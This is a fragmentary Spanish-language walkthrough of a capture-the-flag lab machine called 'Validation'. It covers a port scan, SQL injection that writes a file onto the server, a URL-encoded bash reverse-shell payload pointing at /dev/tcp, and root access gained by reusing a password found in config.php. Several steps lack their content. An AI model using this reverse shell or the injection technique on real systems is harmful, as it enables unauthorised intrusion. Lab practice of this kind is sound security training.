Validation 2
Validation 2
nmap -p- --open -sS -sCV --min-rate 5000 -vvv -n -Pn 10.10.11.116 -oN
Validation
Luego columnas
El 0x3a es : en hexadecimal
Explotacion
Lo que vamos a probar ahora es que si es posible escribir archivo
mediante las explotación de SQLI e introducir valores en rutas del
sistema. Ya que como podemos ver, podemos leer la base de datos
bash%20-c%20'bash%20-i%20%3E%26%20/dev/tcp/ip/1234%200%3E%261'
Espacios ( ) → %20
Escalada de privilegios
Al establecer la conexión vemos un archivo config.php, el cual
contiene lo siguiente :
Probamos la contraseña como root y logramos escalar privilegios